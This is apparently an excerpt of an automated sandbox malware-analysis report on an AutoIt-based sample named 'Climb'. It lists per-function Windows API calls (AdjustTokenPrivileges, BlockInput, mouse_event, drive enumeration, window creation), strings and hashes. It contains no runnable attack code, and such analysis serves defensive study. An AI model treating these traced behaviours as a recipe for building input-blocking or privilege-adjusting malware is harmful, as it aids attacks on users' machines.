Function 00111A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00111B48), ref: 00111A20
CloseHandle.KERNEL32(?,?,00111B48), ref: 00111A35

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: daf76f3c21b0e41882494dbc04fcdf47fcba3dd96015b1f3f9c5eaccacd91718
Instruction ID: 1c8c5f7ce89d2e8303f54bffccb803713e13ed1465712f35d405a2a855d23343
Opcode Fuzzy Hash: daf76f3c21b0e41882494dbc04fcdf47fcba3dd96015b1f3f9c5eaccacd91718
Instruction Fuzzy Hash: FEE09A76114610BEEB252B10FC05FB6BBA9EB04311F14892EB59981471DBA26C91DA50

Function 0012F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0012F51A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f5d26963871f7f73b932dd9909c93d7a04b6a20a52ddb8965ec2b313c456a2c7
Instruction ID: ed2d71f0428c19a47e7d8c428a5026fbd020ab4262acada6e2a900a6dbd0a153
Opcode Fuzzy Hash: f5d26963871f7f73b932dd9909c93d7a04b6a20a52ddb8965ec2b313c456a2c7
Instruction Fuzzy Hash: E3E012352002145FD7109F69E404DD6B7E8AFA57A1F018429F84AD7252D670A9418BA0

Function 0011EC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0011EC95

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 8a86489267f5a152d4895fe458f6c2e678fac817505b86e93e1bd12da32f08e8
Instruction ID: fabfc3c69cde8d448cf7ed51531881400b078a5cbd4fc12ad49be8ee10f7f431
Opcode Fuzzy Hash: 8a86489267f5a152d4895fe458f6c2e678fac817505b86e93e1bd12da32f08e8
Instruction Fuzzy Hash: FFD05EB619430079E81C0ABC9F2FFF60989E302761F804369F902D96A5EBC199C092A1

Function 000D0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,000D075E), ref: 000D0D4A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2f7e7e40f6526e659684cbaeb6bd375939514c5fb1721da498fe016ab76a4eba
Instruction ID: 15482b95811ed7d63b9cf5ef6169902d80249cf4dee776987c7312218e0d7e56
Opcode Fuzzy Hash: 2f7e7e40f6526e659684cbaeb6bd375939514c5fb1721da498fe016ab76a4eba
Instruction Fuzzy Hash:

Function 0013353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0013358D
DeleteObject.GDI32(00000000), ref: 001335A0
DestroyWindow.USER32 ref: 001335AF
GetDesktopWindow.USER32 ref: 001335CA
GetWindowRect.USER32(00000000), ref: 001335D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00133700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0013370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00133755
GetClientRect.USER32(00000000,?), ref: 00133761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0013379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001337BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001337D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001337DD
GlobalLock.KERNEL32(00000000), ref: 001337E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001337F5
GlobalUnlock.KERNEL32(00000000), ref: 001337FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00133805
GlobalFree.KERNEL32(00000000), ref: 00133810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00133822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00150C04,00000000), ref: 00133838
GlobalFree.KERNEL32(00000000), ref: 00133848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0013386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0013388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001338AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00133A9C

Strings

static, xrefs: 00133797, 001338EE
, xrefs: 00133A22
AutoIt v3, xrefs: 0013374F
DISPLAY, xrefs: 001338FF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: f4179b7fe33da8ca853ff4c1df2a70709b2ed613cbe7c34b375709739dbb01bd
Instruction ID: 0f0bad4bc423fbdbd537e1c7c5845494cd570064bf34ce8e66038dcd068a947c
Opcode Fuzzy Hash: f4179b7fe33da8ca853ff4c1df2a70709b2ed613cbe7c34b375709739dbb01bd
Instruction Fuzzy Hash: 5E027975A00205EFEB14DF64DC89EAE7BB9FB49710F008158F915AB2A1CB74AE41CB64

Function 00147B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00147B67
GetSysColorBrush.USER32(0000000F), ref: 00147B98
GetSysColor.USER32(0000000F), ref: 00147BA4
SetBkColor.GDI32(?,000000FF), ref: 00147BBE
SelectObject.GDI32(?,?), ref: 00147BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00147BF8
GetSysColor.USER32(00000010), ref: 00147C00
CreateSolidBrush.GDI32(00000000), ref: 00147C07
FrameRect.USER32(?,?,00000000), ref: 00147C16
DeleteObject.GDI32(00000000), ref: 00147C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00147C68
FillRect.USER32(?,?,?), ref: 00147C9A
GetWindowLongW.USER32(?,000000F0), ref: 00147CBC

Part of subcall function 00147E22: GetSysColor.USER32(00000012), ref: 00147E5B
Part of subcall function 00147E22: SetTextColor.GDI32(?,00147B2D), ref: 00147E5F
Part of subcall function 00147E22: GetSysColorBrush.USER32(0000000F), ref: 00147E75
Part of subcall function 00147E22: GetSysColor.USER32(0000000F), ref: 00147E80
Part of subcall function 00147E22: GetSysColor.USER32(00000011), ref: 00147E9D
Part of subcall function 00147E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00147EAB
Part of subcall function 00147E22: SelectObject.GDI32(?,00000000), ref: 00147EBC
Part of subcall function 00147E22: SetBkColor.GDI32(?,?), ref: 00147EC5
Part of subcall function 00147E22: SelectObject.GDI32(?,?), ref: 00147ED2
Part of subcall function 00147E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00147EF1
Part of subcall function 00147E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00147F08
Part of subcall function 00147E22: GetWindowLongW.USER32(?,000000F0), ref: 00147F15

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 16f35c41432204a6a2321c78b82ff6651d92072fdd0f63d243f3b99f71168849
Instruction ID: 19f1211894de9ddf2479fea08dee757b9de9f2b948cac98f33ac53601029aaef
Opcode Fuzzy Hash: 16f35c41432204a6a2321c78b82ff6651d92072fdd0f63d243f3b99f71168849
Instruction Fuzzy Hash: C3A19E76108302AFDB119F64EC48E6BBBB9FF49720F100A19F962A65F0DB71D984CB51

Function 000B1625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 000B16B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 000F2B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000F2B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000F2F85

Part of subcall function 000B1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B1488,?,00000000,?,?,?,?,000B145A,00000000,?), ref: 000B1865

SendMessageW.USER32(?,00001053), ref: 000F2FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000F2FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 000F2FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 000F2FF9

Strings

0, xrefs: 000F2E11

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 7253759ad0726894cace6dc1bb19a8e06e5a8b1a67bd1fe414d03e1a9c8993b3
Instruction ID: 1a8fc7bcc58b1ec13b6ef6f69c197c01f218a4882438dbcbf1caa5254708571c
Opcode Fuzzy Hash: 7253759ad0726894cace6dc1bb19a8e06e5a8b1a67bd1fe414d03e1a9c8993b3
Instruction Fuzzy Hash: 2412DD30604215AFCB65CF14C8A5BFAB7F1FB45304F584129F685DBA62CB31E882EB91

Function 0013316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0013319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001332C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00133306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00133316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0013335D
GetClientRect.USER32(00000000,?), ref: 00133369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001333B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001333C1
GetStockObject.GDI32(00000011), ref: 001333D1
SelectObject.GDI32(00000000,00000000), ref: 001333D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001333E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001333EE
DeleteDC.GDI32(00000000), ref: 001333F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00133423
SendMessageW.USER32(00000030,00000000,00000001), ref: 0013343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0013347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0013348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 0013349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001334D4
GetStockObject.GDI32(00000011), ref: 001334DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001334EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001334F4

Strings

static, xrefs: 001333AC, 001334CE
msctls_progress32, xrefs: 00133470
AutoIt v3, xrefs: 00133355
DISPLAY, xrefs: 001333B7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 7907ef154bf6578de819bfe2984fdcb1db481b81b49465b2e0e007fb8cb92e1e
Instruction ID: 06f2eef55dc960bbaa4b7dbec470045c346df19f6a688392c36052d7bcef2023
Opcode Fuzzy Hash: 7907ef154bf6578de819bfe2984fdcb1db481b81b49465b2e0e007fb8cb92e1e
Instruction Fuzzy Hash: 80B13E75A00215AFEB14DFA8DC49FAEBBB9FB49710F008114F915E72A1DB74AE40CB64

Function 00125524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00125532
GetDriveTypeW.KERNEL32(?,0014DC30,?,\\.\,0014DCD0), ref: 0012560F
SetErrorMode.KERNEL32(00000000,0014DC30,?,\\.\,0014DCD0), ref: 0012577B

Strings

FileBackedVirtual, xrefs: 00125731
SSD, xrefs: 0012568F
ATA, xrefs: 001256DD
RAMDisk, xrefs: 00125639
CDROM, xrefs: 00125640
Unknown, xrefs: 00125632, 001256C8
ATAPI, xrefs: 001256D6
Fixed, xrefs: 0012564E
iSCSI, xrefs: 00125707
RAID, xrefs: 00125700
Virtual, xrefs: 0012572A
PhysicalDrive, xrefs: 001255BB
SSA, xrefs: 001256EB
SAS, xrefs: 0012570E
USB, xrefs: 001256F9
SATA, xrefs: 00125715
Network, xrefs: 00125647
\\.\, xrefs: 00125584
SCSI, xrefs: 001256CF
Fibre, xrefs: 001256F2
Removable, xrefs: 00125655, 0012565A
1394, xrefs: 001256E4
MMC, xrefs: 00125723

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2ec0745b86ac16e0ac66a132ba6b19da6046056b18e45e4b934ebd0b734abb0f
Instruction ID: f9b71e899fa28829c33b31ffbc8227e46f75941c428810987a2a2ef297d48854
Opcode Fuzzy Hash: 2ec0745b86ac16e0ac66a132ba6b19da6046056b18e45e4b934ebd0b734abb0f
Instruction Fuzzy Hash: A9610430A88A15EFCB28DF64E9D2DB877B3EF14350F658025E40AAB292D731DD51CB51

Function 00141A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00141BC4
GetDesktopWindow.USER32 ref: 00141BD9
GetWindowRect.USER32(00000000), ref: 00141BE0
GetWindowLongW.USER32(?,000000F0), ref: 00141C35
DestroyWindow.USER32(?), ref: 00141C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00141C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00141CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00141CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00141CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00141CE1
IsWindowVisible.USER32(00000000), ref: 00141D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00141D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00141D6C
GetWindowRect.USER32(00000000,?), ref: 00141D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00141DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00141DC4
CopyRect.USER32(?,?), ref: 00141DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00141E46

Strings

0, xrefs: 00141B6F
(, xrefs: 00141DB7
tooltips_class32, xrefs: 00141C82

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 239996cf1c6f2696e7028ac94624f8f271562967d1b6ed24db32a8a84929a2fa
Instruction ID: 91d37c269f83e1e11cf12b08267624bbb8d1c817c753780afa0159bd3bf125df
Opcode Fuzzy Hash: 239996cf1c6f2696e7028ac94624f8f271562967d1b6ed24db32a8a84929a2fa
Instruction Fuzzy Hash: B4B18F71604301AFDB14DF64D889BAEBBE5FF85354F00891CF9999B2A1C731E884CB92

Function 00140CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00140D81
_wcslen.LIBCMT ref: 00140DBB
_wcslen.LIBCMT ref: 00140E25
_wcslen.LIBCMT ref: 00140E8D
_wcslen.LIBCMT ref: 00140F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00140F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00140FA0

Part of subcall function 000CFD52: _wcslen.LIBCMT ref: 000CFD5D

Part of subcall function 00112B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00112BA5
Part of subcall function 00112B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00112BD7

Strings

GETSELECTED, xrefs: 0014107D
SELECTALL, xrefs: 00140FB1
ISSELECTED, xrefs: 00140F79
DESELECT, xrefs: 00141038
SELECTINVERT, xrefs: 0014101A
GETSUBITEMCOUNT, xrefs: 00140E20, 00140E3B
SELECTCLEAR, xrefs: 00140FC9
VIEWCHANGE, xrefs: 00141111
GETSELECTEDCOUNT, xrefs: 00140F0C, 00140F27
SELECT, xrefs: 00140FE4
GETITEMCOUNT, xrefs: 00140DB2, 00140DD3
GETTEXT, xrefs: 00140E88, 00140EA3
FINDITEM, xrefs: 001410C3

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: aaef54a8682cd665eb148199f9c7e8b5d831abe6322d55902ad89821536d902f
Instruction ID: 5992857e1989b77b34d4c7791635b09f868ff27b3bbeaa6dae202871e49fc38b
Opcode Fuzzy Hash: aaef54a8682cd665eb148199f9c7e8b5d831abe6322d55902ad89821536d902f
Instruction Fuzzy Hash: 0CE1DF312083419FC719DF25C9518AAB3E2FF98754B14896CF49AAB3B2DB30ED85CB51

Function 000B2521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B25F8
GetSystemMetrics.USER32(00000007), ref: 000B2600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B262B
GetSystemMetrics.USER32(00000008), ref: 000B2633
GetSystemMetrics.USER32(00000004), ref: 000B2658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000B2675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000B2685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000B26B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000B26CC
GetClientRect.USER32(00000000,000000FF), ref: 000B26EA
GetStockObject.GDI32(00000011), ref: 000B2706
SendMessageW.USER32(00000000,00000030,00000000), ref: 000B2711

Part of subcall function 000B19CD: GetCursorPos.USER32(?), ref: 000B19E1
Part of subcall function 000B19CD: ScreenToClient.USER32(00000000,?), ref: 000B19FE
Part of subcall function 000B19CD: GetAsyncKeyState.USER32(00000001), ref: 000B1A23
Part of subcall function 000B19CD: GetAsyncKeyState.USER32(00000002), ref: 000B1A3D

SetTimer.USER32(00000000,00000000,00000028,000B199C), ref: 000B2738

Strings

AutoIt v3 GUI, xrefs: 000B26B0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: cede9ddda825d2e25948e1760e585609e4555adade0ee5e216a6ae2df3e6bc45
Instruction ID: b228c6a40e2c5606277dd612e80ffc65a36c5ad5a5ef6f86343385bd2b783965
Opcode Fuzzy Hash: cede9ddda825d2e25948e1760e585609e4555adade0ee5e216a6ae2df3e6bc45
Instruction Fuzzy Hash: 69B15B35A002099FDF15DFA8DC85BEE7BB5FB48324F104229FA15AB2A0DB74D981CB51

Function 001116D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

